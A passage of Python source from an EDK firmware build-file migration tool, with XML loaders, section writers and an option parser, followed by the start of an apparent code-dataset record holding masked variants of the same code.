Pcd.TokenSpaceGuidCName = XmlElement(XmlPcd, XmlTag)
XmlTag = "PcdEntry/DatumType"
Pcd.DatumType = XmlElement(XmlPcd, XmlTag)
XmlTag = "PcdEntry/MaxDatumSize"
Pcd.MaxDatumSize = XmlElement(XmlPcd, XmlTag)
XmlTag = "PcdEntry/DefaultValue"
Pcd.DefaultValue = XmlElement(XmlPcd, XmlTag)
XmlTag = "PcdItemType"
Pcd.ItemType = XmlAttribute(XmlPcd, XmlTag)
XmlTag = "PcdEntry/ValidUsage"
Pcd.ValidUsage = XmlElement(XmlPcd, XmlTag).split()
XmlTag = "SupModuleList"
Pcd.SupModuleList = XmlAttribute(XmlPcd, XmlTag).split()
SetCommon(Pcd, XmlPcd)
return Pcd
## Load a new LibraryClass class object.
#
# Read an input XML LibraryClass DOM object and return an object of LibraryClass
# contained in the DOM object.
#
# @param XmlLibraryClass A child XML DOM object in a Common XML DOM.
#
# @retvel LibraryClass A new LibraryClass object created by XmlLibraryClass.
#
def LoadLibraryClass(XmlLibraryClass):
LibraryClass = LibraryClassClass()
XmlTag = "LibraryClass/Keyword"
LibraryClass.LibraryClass = XmlElement(XmlLibraryClass, XmlTag)
if LibraryClass.LibraryClass == "":
XmlTag = "Name"
LibraryClass.LibraryClass = XmlAttribute(XmlLibraryClass, XmlTag)
XmlTag = "LibraryClass/IncludeHeader"
LibraryClass.IncludeHeader = XmlElement(XmlLibraryClass, XmlTag)
XmlTag = "RecommendedInstanceVersion"
RecommendedInstanceVersion = XmlAttribute(XmlLibraryClass, XmlTag)
LibraryClass.RecommendedInstanceVersion = RecommendedInstanceVersion
XmlTag = "RecommendedInstanceGuid"
RecommendedInstanceGuid = XmlAttribute(XmlLibraryClass, XmlTag)
LibraryClass.RecommendedInstanceGuid = RecommendedInstanceGuid
XmlTag = "SupModuleList"
SupModules = XmlAttribute(XmlLibraryClass, XmlTag)
LibraryClass.SupModuleList = SupModules.split()
SetCommon(LibraryClass, XmlLibraryClass)
return LibraryClass
## Load a new Build Option class object.
#
# Read an input XML BuildOption DOM object and return an object of Build Option
# contained in the DOM object.
#
# @param XmlBuildOption A child XML DOM object in a Common XML DOM.
#
# @retvel BuildOption A new Build Option object created by XmlBuildOption.
#
def LoadBuildOption(XmlBuildOption):
"""Return a new BuildOptionClass object equivalent to XmlBuildOption"""
BuildOption = BuildOptionClass()
BuildOption.Option = XmlElementData(XmlBuildOption)
XmlTag = "BuildTargets"
BuildOption.BuildTargetList = XmlAttribute(XmlBuildOption, XmlTag).split()
XmlTag = "ToolChainFamily"
BuildOption.ToolChainFamily = XmlAttribute(XmlBuildOption, XmlTag)
XmlTag = "TagName"
BuildOption.TagName = XmlAttribute(XmlBuildOption, XmlTag)
XmlTag = "ToolCode"
BuildOption.ToolCode = XmlAttribute(XmlBuildOption, XmlTag)
XmlTag = "SupArchList"
BuildOption.SupArchList = XmlAttribute(XmlBuildOption, XmlTag).split()
return BuildOption
## Load a new User Extensions class object.
#
# Read an input XML UserExtensions DOM object and return an object of User
# Extensions contained in the DOM object.
#
# @param XmlUserExtensions A child XML DOM object in a Common XML DOM.
#
# @retvel UserExtensions A new User Extensions object created by
# XmlUserExtensions.
#
def LoadUserExtensions(XmlUserExtensions):
UserExtensions = UserExtensionsClass()
XmlTag = "UserID"
UserExtensions.UserID = XmlAttribute(XmlUserExtensions, XmlTag)
XmlTag = "Identifier"
UserExtensions.Identifier = XmlAttribute(XmlUserExtensions, XmlTag)
UserExtensions.Content = XmlElementData(XmlUserExtensions)
return UserExtensions
## Store content to a text file object.
#
# Write some text file content to a text file object. The contents may echo
# in screen in a verbose way.
#
# @param TextFile The text file object.
# @param Content The string object to be written to a text file.
#
def StoreTextFile(TextFile, Content):
EdkLogger.verbose(Content)
TextFile.write(Content)
## Add item to a section.
#
# Add an Item with specific CPU architecture to section dictionary.
# The possible duplication is ensured to be removed.
#
# @param Section Section dictionary indexed by CPU architecture.
# @param Arch CPU architecture: Ia32, X64, Ipf, ARM, AARCH64, Ebc or Common.
# @param Item The Item to be added to section dictionary.
#
def AddToSection(Section, Arch, Item):
SectionArch = Section.get(Arch, [])
if Item not in SectionArch:
SectionArch.append(Item)
Section[Arch] = SectionArch
## Get section contents.
#
# Return the content of section named SectionName.
# the contents is based on Methods and ObjectLists.
#
# @param SectionName The name of the section.
# @param Method A function returning a string item of an object.
# @param ObjectList The list of object.
#
# @retval Section The string content of a section.
#
def GetSection(SectionName, Method, ObjectList):
SupportedArches = ["common", "Ia32", "X64", "Ipf", "Ebc", "ARM", "AARCH64"]
SectionDict = {}
for Object in ObjectList:
Item = Method(Object)
if Item == "":
continue
Item = " %s" % Item
Arches = Object.SupArchList
if len(Arches) == 0:
AddToSection(SectionDict, "common", Item)
else:
for Arch in SupportedArches:
if Arch.upper() in Arches:
AddToSection(SectionDict, Arch, Item)
Section = ""
for Arch in SupportedArches:
SectionArch = "\n".join(SectionDict.get(Arch, []))
if SectionArch != "":
Section += "[%s.%s]\n%s\n" % (SectionName, Arch, SectionArch)
Section += "\n"
if Section != "":
Section += "\n"
return Section
## Store file header to a text file.
#
# Write standard file header to a text file. The content includes copyright,
# abstract, description and license extracted from CommonHeader class object.
#
# @param TextFile The text file object.
# @param CommonHeader The source CommonHeader class object.
#
def StoreHeader(TextFile, CommonHeader):
CopyRight = CommonHeader.Copyright
Abstract = CommonHeader.Abstract
Description = CommonHeader.Description
License = CommonHeader.License
Header = "#/** @file\n#\n"
Header += "# " + Abstract + "\n#\n"
Header += "# " + Description.strip().replace("\n", "\n# ") + "\n"
Header += "# " + CopyRight + "\n#\n"
Header += "# " + License.replace("\n", "\n# ").replace(" ", " ")
Header += "\n#\n#**/\n\n"
StoreTextFile(TextFile, Header)
## Store file header to a text file.
#
# Write Defines section to a text file. DefinesTupleList determines the content.
#
# @param TextFile The text file object.
# @param DefinesTupleList The list of (Tag, Value) to be added as one item.
#
def StoreDefinesSection(TextFile, DefinesTupleList):
Section = "[Defines]\n"
for DefineItem in DefinesTupleList:
Section += " %-30s = %s\n" % DefineItem
Section += "\n\n"
StoreTextFile(TextFile, Section)
## Return one User Extension section.
#
# Read the input UserExtentsions class object and return one section.
#
# @param UserExtensions An input UserExtensions class object.
#
# @retval UserExtensionSection A section representing UserExtensions object.
#
def GetUserExtensions(UserExtensions):
UserId = UserExtensions.UserID
Identifier = UserExtensions.Identifier
Content = UserExtensions.Content
return "[UserExtensions.%s.%s]\n %s\n\n" % (UserId, Identifier, Content)
## Regular expression to match an equation.
mReEquation = re.compile(r"\s*(\S+)\s*=\s*(\S*)\s*")
## Return a value tuple matching information in a text fle.
#
# Parse the text file and return a value tuple corresponding to an input tag
# tuple. In case of any error, an tuple of empty strings is returned.
#
# @param FileName The file name of the text file.
# @param TagTuple A tuple of tags as the key to the value.
#
# @param ValueTupe The returned tuple corresponding to the tag tuple.
#
def GetTextFileInfo(FileName, TagTuple):
ValueTuple = [""] * len(TagTuple)
try:
for Line in open(FileName):
Line = Line.split("#", 1)[0]
MatchEquation = mReEquation.match(Line)
if MatchEquation:
Tag = MatchEquation.group(1).upper()
Value = MatchEquation.group(2)
for Index in range(len(TagTuple)):
if TagTuple[Index] == Tag:
ValueTuple[Index] = Value
except:
EdkLogger.info("IO Error in reading file %s" % FileName)
return ValueTuple
## Return a value tuple matching information in an XML fle.
#
# Parse the XML file and return a value tuple corresponding to an input tag
# tuple. In case of any error, an tuple of empty strings is returned.
#
# @param FileName The file name of the XML file.
# @param TagTuple A tuple of tags as the key to the value.
#
# @param ValueTupe The returned tuple corresponding to the tag tuple.
#
def GetXmlFileInfo(FileName, TagTuple):
XmlDom = XmlParseFile(FileName)
return tuple([XmlElement(XmlDom, XmlTag) for XmlTag in TagTuple])
## Parse migration command line options
#
# Use standard Python module optparse to parse command line option of this tool.
#
# @param Source The source file type.
# @param Destinate The destinate file type.
#
# @retval Options A optparse object containing the parsed options.
# @retval InputFile Path of an source file to be migrated.
#
def MigrationOptionParser(Source, Destinate, ToolName, VersionNumber = 1.0):
# use clearer usage to override default usage message
UsageString = "%s [-a] [-v|-q] [-o <output_file>] <input_file>" % ToolName
Version = "%s Version %.2f" % (ToolName, VersionNumber)
Copyright = "Copyright (c) 2007, Intel Corporation. All rights reserved."
Parser = OptionParser(description=Copyright, version=Version, usage=UsageString)
Parser.add_option("-o", "--output", dest="OutputFile", help="The name of the %s file to be created." % Destinate)
Parser.add_option("-a", "--auto", dest="AutoWrite", action="store_true", default=False, help="Automatically create the %s file using the name of the %s file and replacing file extension" % (Source, Destinate))
Parser.add_option("-q", "--quiet", action="store_true", type=None, help="Disable all messages except FATAL ERRORS.")
Parser.add_option("-v", "--verbose", action="store_true", type=None, help="Turn on verbose output with informational messages printed.")
Options, Args = Parser.parse_args()
# Set logging level
if Options.verbose:
EdkLogger.setLevel(EdkLogger.VERBOSE)
elif Options.quiet:
EdkLogger.setLevel(EdkLogger.QUIET)
else:
EdkLogger.setLevel(EdkLogger.INFO)
# error check
if len(Args) == 0:
raise MigrationError(PARAMETER_MISSING, name="Input file", usage=Parser.get_usage())
if len(Args) > 1:
raise MigrationError(PARAMETER_INVALID, name="Too many input files", usage=Parser.get_usage())
InputFile = Args[0]
if not os.path.exists(InputFile):
raise MigrationError(FILE_NOT_FOUND, name=InputFile)
if Options.OutputFile:
if Options.AutoWrite:
raise MigrationError(OPTION_CONFLICT, arg1="-o", arg2="-a", usage=Parser.get_usage())
else:
if Options.AutoWrite:
Options.OutputFile = os.path.splitext(InputFile)[0] + "." + Destinate.lower()
else:
raise MigrationError(OPTION_MISSING, name="-o", usage=Parser.get_usage())
return Options, InputFile
# This acts like the main() function for the script, unless it is 'import'ed
# into another script.
if __name__ == '__main__':
pass
|
flexible
|
{
"blob_id": "2dbb1051b35898288db629fd0c5b3887c429e9b8",
"index": 1313,
"step-1": "<mask token>\n\n\ndef SetCommon(Common, XmlCommon):\n XmlTag = 'Usage'\n Common.Usage = XmlAttribute(XmlCommon, XmlTag).split()\n XmlTag = 'FeatureFlag'\n Common.FeatureFlag = XmlAttribute(XmlCommon, XmlTag)\n XmlTag = 'SupArchList'\n Common.SupArchList = XmlAttribute(XmlCommon, XmlTag).split()\n XmlTag = XmlNodeName(XmlCommon) + '/' + 'HelpText'\n Common.HelpText = XmlElement(XmlCommon, XmlTag)\n\n\ndef SetIdentification(CommonHeader, XmlCommonHeader, NameTag, FileName):\n XmlParentTag = XmlNodeName(XmlCommonHeader)\n XmlTag = XmlParentTag + '/' + NameTag\n CommonHeader.Name = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParentTag + '/' + 'GuidValue'\n CommonHeader.Guid = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParentTag + '/' + 'Version'\n CommonHeader.Version = XmlElement(XmlCommonHeader, XmlTag)\n CommonHeader.FileName = os.path.basename(FileName)\n CommonHeader.FullPath = os.path.abspath(FileName)\n\n\n<mask token>\n\n\ndef AddToSpecificationDict(SpecificationDict, SpecificationString):\n \"\"\"Abstract specification name, value pair from Specification String\"\"\"\n for SpecificationMatch in mReSpecification.finditer(SpecificationString):\n Specification = SpecificationMatch.group('Specification')\n Value = SpecificationMatch.group('Value')\n SpecificationDict[Specification] = Value\n\n\n<mask token>\n\n\ndef LoadClonedRecord(XmlCloned):\n ClonedRecord = ClonedRecordClass()\n XmlTag = 'Id'\n ClonedRecord.Id = int(XmlAttribute(XmlCloned, XmlTag))\n XmlTag = 'FarGuid'\n ClonedRecord.FarGuid = XmlAttribute(XmlCloned, XmlTag)\n XmlTag = 'Cloned/PackageGuid'\n ClonedRecord.PackageGuid = XmlElement(XmlCloned, XmlTag)\n XmlTag = 'Cloned/PackageVersion'\n ClonedRecord.PackageVersion = XmlElement(XmlCloned, XmlTag)\n XmlTag = 'Cloned/ModuleGuid'\n ClonedRecord.ModuleGuid = XmlElement(XmlCloned, XmlTag)\n XmlTag = 'Cloned/ModuleVersion'\n ClonedRecord.ModuleVersion = XmlElement(XmlCloned, XmlTag)\n return ClonedRecord\n\n\ndef LoadGuidProtocolPpiCommon(XmlGuidProtocolPpiCommon):\n GuidProtocolPpiCommon = GuidProtocolPpiCommonClass()\n XmlTag = 'Name'\n GuidProtocolPpiCommon.Name = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)\n XmlParent = XmlNodeName(XmlGuidProtocolPpiCommon)\n if XmlParent == 'Entry':\n XmlTag = '%s/C_Name' % XmlParent\n elif XmlParent == 'GuidCNames':\n XmlTag = '%s/GuidCName' % XmlParent\n else:\n XmlTag = '%s/%sCName' % (XmlParent, XmlParent)\n GuidProtocolPpiCommon.CName = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)\n XmlTag = XmlParent + '/' + 'GuidValue'\n GuidProtocolPpiCommon.Guid = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)\n if XmlParent.endswith('Notify'):\n GuidProtocolPpiCommon.Notify = True\n XmlTag = 'GuidTypeList'\n GuidTypes = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)\n GuidProtocolPpiCommon.GuidTypeList = GuidTypes.split()\n XmlTag = 'SupModuleList'\n SupModules = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)\n GuidProtocolPpiCommon.SupModuleList = SupModules.split()\n SetCommon(GuidProtocolPpiCommon, XmlGuidProtocolPpiCommon)\n return GuidProtocolPpiCommon\n\n\ndef LoadPcd(XmlPcd):\n \"\"\"Return a new PcdClass object equivalent to XmlPcd\"\"\"\n Pcd = PcdClass()\n XmlTag = 'PcdEntry/C_Name'\n Pcd.CName = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/Token'\n Pcd.Token = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/TokenSpaceGuidCName'\n Pcd.TokenSpaceGuidCName = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/DatumType'\n Pcd.DatumType = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/MaxDatumSize'\n Pcd.MaxDatumSize = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/DefaultValue'\n Pcd.DefaultValue = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdItemType'\n Pcd.ItemType = XmlAttribute(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/ValidUsage'\n Pcd.ValidUsage = XmlElement(XmlPcd, XmlTag).split()\n XmlTag = 'SupModuleList'\n Pcd.SupModuleList = XmlAttribute(XmlPcd, XmlTag).split()\n SetCommon(Pcd, XmlPcd)\n return Pcd\n\n\n<mask token>\n\n\ndef StoreTextFile(TextFile, Content):\n EdkLogger.verbose(Content)\n TextFile.write(Content)\n\n\ndef AddToSection(Section, Arch, Item):\n SectionArch = Section.get(Arch, [])\n if Item not in SectionArch:\n SectionArch.append(Item)\n Section[Arch] = SectionArch\n\n\n<mask token>\n\n\ndef GetUserExtensions(UserExtensions):\n UserId = UserExtensions.UserID\n Identifier = UserExtensions.Identifier\n Content = UserExtensions.Content\n return '[UserExtensions.%s.%s]\\n %s\\n\\n' % (UserId, Identifier, Content)\n\n\n<mask token>\n\n\ndef GetXmlFileInfo(FileName, TagTuple):\n XmlDom = XmlParseFile(FileName)\n return tuple([XmlElement(XmlDom, XmlTag) for XmlTag in TagTuple])\n\n\ndef MigrationOptionParser(Source, Destinate, ToolName, VersionNumber=1.0):\n UsageString = '%s [-a] [-v|-q] [-o <output_file>] <input_file>' % ToolName\n Version = '%s Version %.2f' % (ToolName, VersionNumber)\n Copyright = 'Copyright (c) 2007, Intel Corporation. All rights reserved.'\n Parser = OptionParser(description=Copyright, version=Version, usage=\n UsageString)\n Parser.add_option('-o', '--output', dest='OutputFile', help=\n 'The name of the %s file to be created.' % Destinate)\n Parser.add_option('-a', '--auto', dest='AutoWrite', action='store_true',\n default=False, help=\n 'Automatically create the %s file using the name of the %s file and replacing file extension'\n % (Source, Destinate))\n Parser.add_option('-q', '--quiet', action='store_true', type=None, help\n ='Disable all messages except FATAL ERRORS.')\n Parser.add_option('-v', '--verbose', action='store_true', type=None,\n help='Turn on verbose output with informational messages printed.')\n Options, Args = Parser.parse_args()\n if Options.verbose:\n EdkLogger.setLevel(EdkLogger.VERBOSE)\n elif Options.quiet:\n EdkLogger.setLevel(EdkLogger.QUIET)\n else:\n EdkLogger.setLevel(EdkLogger.INFO)\n if len(Args) == 0:\n raise MigrationError(PARAMETER_MISSING, name='Input file', usage=\n Parser.get_usage())\n if len(Args) > 1:\n raise MigrationError(PARAMETER_INVALID, name='Too many input files',\n usage=Parser.get_usage())\n InputFile = Args[0]\n if not os.path.exists(InputFile):\n raise MigrationError(FILE_NOT_FOUND, name=InputFile)\n if Options.OutputFile:\n if Options.AutoWrite:\n raise MigrationError(OPTION_CONFLICT, arg1='-o', arg2='-a',\n usage=Parser.get_usage())\n elif Options.AutoWrite:\n Options.OutputFile = os.path.splitext(InputFile)[0\n ] + '.' + Destinate.lower()\n else:\n raise MigrationError(OPTION_MISSING, name='-o', usage=Parser.\n get_usage())\n return Options, InputFile\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef SetCommon(Common, XmlCommon):\n XmlTag = 'Usage'\n Common.Usage = XmlAttribute(XmlCommon, XmlTag).split()\n XmlTag = 'FeatureFlag'\n Common.FeatureFlag = XmlAttribute(XmlCommon, XmlTag)\n XmlTag = 'SupArchList'\n Common.SupArchList = XmlAttribute(XmlCommon, XmlTag).split()\n XmlTag = XmlNodeName(XmlCommon) + '/' + 'HelpText'\n Common.HelpText = XmlElement(XmlCommon, XmlTag)\n\n\ndef SetIdentification(CommonHeader, XmlCommonHeader, NameTag, FileName):\n XmlParentTag = XmlNodeName(XmlCommonHeader)\n XmlTag = XmlParentTag + '/' + NameTag\n CommonHeader.Name = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParentTag + '/' + 'GuidValue'\n CommonHeader.Guid = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParentTag + '/' + 'Version'\n CommonHeader.Version = XmlElement(XmlCommonHeader, XmlTag)\n CommonHeader.FileName = os.path.basename(FileName)\n CommonHeader.FullPath = os.path.abspath(FileName)\n\n\n<mask token>\n\n\ndef AddToSpecificationDict(SpecificationDict, SpecificationString):\n \"\"\"Abstract specification name, value pair from Specification String\"\"\"\n for SpecificationMatch in mReSpecification.finditer(SpecificationString):\n Specification = SpecificationMatch.group('Specification')\n Value = SpecificationMatch.group('Value')\n SpecificationDict[Specification] = Value\n\n\ndef SetCommonHeader(CommonHeader, XmlCommonHeader):\n \"\"\"Set all attributes of CommonHeaderClass object from XmlCommonHeader\"\"\"\n XmlParent = XmlNodeName(XmlCommonHeader)\n XmlTag = XmlParent + '/' + 'Abstract'\n CommonHeader.Abstract = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParent + '/' + 'Description'\n CommonHeader.Description = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParent + '/' + 'Copyright'\n CommonHeader.Copyright = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParent + '/' + 'License'\n CommonHeader.License = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParent + '/' + 'Specification'\n Specification = XmlElement(XmlCommonHeader, XmlTag)\n AddToSpecificationDict(CommonHeader.Specification, Specification)\n XmlTag = XmlParent + '/' + 'ModuleType'\n CommonHeader.ModuleType = XmlElement(XmlCommonHeader, XmlTag)\n\n\ndef LoadClonedRecord(XmlCloned):\n ClonedRecord = ClonedRecordClass()\n XmlTag = 'Id'\n ClonedRecord.Id = int(XmlAttribute(XmlCloned, XmlTag))\n XmlTag = 'FarGuid'\n ClonedRecord.FarGuid = XmlAttribute(XmlCloned, XmlTag)\n XmlTag = 'Cloned/PackageGuid'\n ClonedRecord.PackageGuid = XmlElement(XmlCloned, XmlTag)\n XmlTag = 'Cloned/PackageVersion'\n ClonedRecord.PackageVersion = XmlElement(XmlCloned, XmlTag)\n XmlTag = 'Cloned/ModuleGuid'\n ClonedRecord.ModuleGuid = XmlElement(XmlCloned, XmlTag)\n XmlTag = 'Cloned/ModuleVersion'\n ClonedRecord.ModuleVersion = XmlElement(XmlCloned, XmlTag)\n return ClonedRecord\n\n\ndef LoadGuidProtocolPpiCommon(XmlGuidProtocolPpiCommon):\n GuidProtocolPpiCommon = GuidProtocolPpiCommonClass()\n XmlTag = 'Name'\n GuidProtocolPpiCommon.Name = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)\n XmlParent = XmlNodeName(XmlGuidProtocolPpiCommon)\n if XmlParent == 'Entry':\n XmlTag = '%s/C_Name' % XmlParent\n elif XmlParent == 'GuidCNames':\n XmlTag = '%s/GuidCName' % XmlParent\n else:\n XmlTag = '%s/%sCName' % (XmlParent, XmlParent)\n GuidProtocolPpiCommon.CName = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)\n XmlTag = XmlParent + '/' + 'GuidValue'\n GuidProtocolPpiCommon.Guid = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)\n if XmlParent.endswith('Notify'):\n GuidProtocolPpiCommon.Notify = True\n XmlTag = 'GuidTypeList'\n GuidTypes = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)\n GuidProtocolPpiCommon.GuidTypeList = GuidTypes.split()\n XmlTag = 'SupModuleList'\n SupModules = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)\n GuidProtocolPpiCommon.SupModuleList = SupModules.split()\n SetCommon(GuidProtocolPpiCommon, XmlGuidProtocolPpiCommon)\n return GuidProtocolPpiCommon\n\n\ndef LoadPcd(XmlPcd):\n \"\"\"Return a new PcdClass object equivalent to XmlPcd\"\"\"\n Pcd = PcdClass()\n XmlTag = 'PcdEntry/C_Name'\n Pcd.CName = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/Token'\n Pcd.Token = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/TokenSpaceGuidCName'\n Pcd.TokenSpaceGuidCName = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/DatumType'\n Pcd.DatumType = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/MaxDatumSize'\n Pcd.MaxDatumSize = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/DefaultValue'\n Pcd.DefaultValue = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdItemType'\n Pcd.ItemType = XmlAttribute(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/ValidUsage'\n Pcd.ValidUsage = XmlElement(XmlPcd, XmlTag).split()\n XmlTag = 'SupModuleList'\n Pcd.SupModuleList = XmlAttribute(XmlPcd, XmlTag).split()\n SetCommon(Pcd, XmlPcd)\n return Pcd\n\n\ndef LoadLibraryClass(XmlLibraryClass):\n LibraryClass = LibraryClassClass()\n XmlTag = 'LibraryClass/Keyword'\n LibraryClass.LibraryClass = XmlElement(XmlLibraryClass, XmlTag)\n if LibraryClass.LibraryClass == '':\n XmlTag = 'Name'\n LibraryClass.LibraryClass = XmlAttribute(XmlLibraryClass, XmlTag)\n XmlTag = 'LibraryClass/IncludeHeader'\n LibraryClass.IncludeHeader = XmlElement(XmlLibraryClass, XmlTag)\n XmlTag = 'RecommendedInstanceVersion'\n RecommendedInstanceVersion = XmlAttribute(XmlLibraryClass, XmlTag)\n LibraryClass.RecommendedInstanceVersion = RecommendedInstanceVersion\n XmlTag = 'RecommendedInstanceGuid'\n RecommendedInstanceGuid = XmlAttribute(XmlLibraryClass, XmlTag)\n LibraryClass.RecommendedInstanceGuid = RecommendedInstanceGuid\n XmlTag = 'SupModuleList'\n SupModules = XmlAttribute(XmlLibraryClass, XmlTag)\n LibraryClass.SupModuleList = SupModules.split()\n SetCommon(LibraryClass, XmlLibraryClass)\n return LibraryClass\n\n\ndef LoadBuildOption(XmlBuildOption):\n \"\"\"Return a new BuildOptionClass object equivalent to XmlBuildOption\"\"\"\n BuildOption = BuildOptionClass()\n BuildOption.Option = XmlElementData(XmlBuildOption)\n XmlTag = 'BuildTargets'\n BuildOption.BuildTargetList = XmlAttribute(XmlBuildOption, XmlTag).split()\n XmlTag = 'ToolChainFamily'\n BuildOption.ToolChainFamily = XmlAttribute(XmlBuildOption, XmlTag)\n XmlTag = 'TagName'\n BuildOption.TagName = XmlAttribute(XmlBuildOption, XmlTag)\n XmlTag = 'ToolCode'\n BuildOption.ToolCode = XmlAttribute(XmlBuildOption, XmlTag)\n XmlTag = 'SupArchList'\n BuildOption.SupArchList = XmlAttribute(XmlBuildOption, XmlTag).split()\n return BuildOption\n\n\ndef LoadUserExtensions(XmlUserExtensions):\n UserExtensions = UserExtensionsClass()\n XmlTag = 'UserID'\n UserExtensions.UserID = XmlAttribute(XmlUserExtensions, XmlTag)\n XmlTag = 'Identifier'\n UserExtensions.Identifier = XmlAttribute(XmlUserExtensions, XmlTag)\n UserExtensions.Content = XmlElementData(XmlUserExtensions)\n return UserExtensions\n\n\ndef StoreTextFile(TextFile, Content):\n EdkLogger.verbose(Content)\n TextFile.write(Content)\n\n\ndef AddToSection(Section, Arch, Item):\n SectionArch = Section.get(Arch, [])\n if Item not in SectionArch:\n SectionArch.append(Item)\n Section[Arch] = SectionArch\n\n\n<mask token>\n\n\ndef StoreHeader(TextFile, CommonHeader):\n CopyRight = CommonHeader.Copyright\n Abstract = CommonHeader.Abstract\n Description = CommonHeader.Description\n License = CommonHeader.License\n Header = '#/** @file\\n#\\n'\n Header += '# ' + Abstract + '\\n#\\n'\n Header += '# ' + Description.strip().replace('\\n', '\\n# ') + '\\n'\n Header += '# ' + CopyRight + '\\n#\\n'\n Header += '# ' + License.replace('\\n', '\\n# ').replace(' ', ' ')\n Header += '\\n#\\n#**/\\n\\n'\n StoreTextFile(TextFile, Header)\n\n\ndef StoreDefinesSection(TextFile, DefinesTupleList):\n Section = '[Defines]\\n'\n for DefineItem in DefinesTupleList:\n Section += ' %-30s = %s\\n' % DefineItem\n Section += '\\n\\n'\n StoreTextFile(TextFile, Section)\n\n\ndef GetUserExtensions(UserExtensions):\n UserId = UserExtensions.UserID\n Identifier = UserExtensions.Identifier\n Content = UserExtensions.Content\n return '[UserExtensions.%s.%s]\\n %s\\n\\n' % (UserId, Identifier, Content)\n\n\n<mask token>\n\n\ndef GetTextFileInfo(FileName, TagTuple):\n ValueTuple = [''] * len(TagTuple)\n try:\n for Line in open(FileName):\n Line = Line.split('#', 1)[0]\n MatchEquation = mReEquation.match(Line)\n if MatchEquation:\n Tag = MatchEquation.group(1).upper()\n Value = MatchEquation.group(2)\n for Index in range(len(TagTuple)):\n if TagTuple[Index] == Tag:\n ValueTuple[Index] = Value\n except:\n EdkLogger.info('IO Error in reading file %s' % FileName)\n return ValueTuple\n\n\ndef GetXmlFileInfo(FileName, TagTuple):\n XmlDom = XmlParseFile(FileName)\n return tuple([XmlElement(XmlDom, XmlTag) for XmlTag in TagTuple])\n\n\ndef MigrationOptionParser(Source, Destinate, ToolName, VersionNumber=1.0):\n UsageString = '%s [-a] [-v|-q] [-o <output_file>] <input_file>' % ToolName\n Version = '%s Version %.2f' % (ToolName, VersionNumber)\n Copyright = 'Copyright (c) 2007, Intel Corporation. All rights reserved.'\n Parser = OptionParser(description=Copyright, version=Version, usage=\n UsageString)\n Parser.add_option('-o', '--output', dest='OutputFile', help=\n 'The name of the %s file to be created.' % Destinate)\n Parser.add_option('-a', '--auto', dest='AutoWrite', action='store_true',\n default=False, help=\n 'Automatically create the %s file using the name of the %s file and replacing file extension'\n % (Source, Destinate))\n Parser.add_option('-q', '--quiet', action='store_true', type=None, help\n ='Disable all messages except FATAL ERRORS.')\n Parser.add_option('-v', '--verbose', action='store_true', type=None,\n help='Turn on verbose output with informational messages printed.')\n Options, Args = Parser.parse_args()\n if Options.verbose:\n EdkLogger.setLevel(EdkLogger.VERBOSE)\n elif Options.quiet:\n EdkLogger.setLevel(EdkLogger.QUIET)\n else:\n EdkLogger.setLevel(EdkLogger.INFO)\n if len(Args) == 0:\n raise MigrationError(PARAMETER_MISSING, name='Input file', usage=\n Parser.get_usage())\n if len(Args) > 1:\n raise MigrationError(PARAMETER_INVALID, name='Too many input files',\n usage=Parser.get_usage())\n InputFile = Args[0]\n if not os.path.exists(InputFile):\n raise MigrationError(FILE_NOT_FOUND, name=InputFile)\n if Options.OutputFile:\n if Options.AutoWrite:\n raise MigrationError(OPTION_CONFLICT, arg1='-o', arg2='-a',\n usage=Parser.get_usage())\n elif Options.AutoWrite:\n Options.OutputFile = os.path.splitext(InputFile)[0\n ] + '.' + Destinate.lower()\n else:\n raise MigrationError(OPTION_MISSING, name='-o', usage=Parser.\n get_usage())\n return Options, InputFile\n\n\n<mask token>\n",
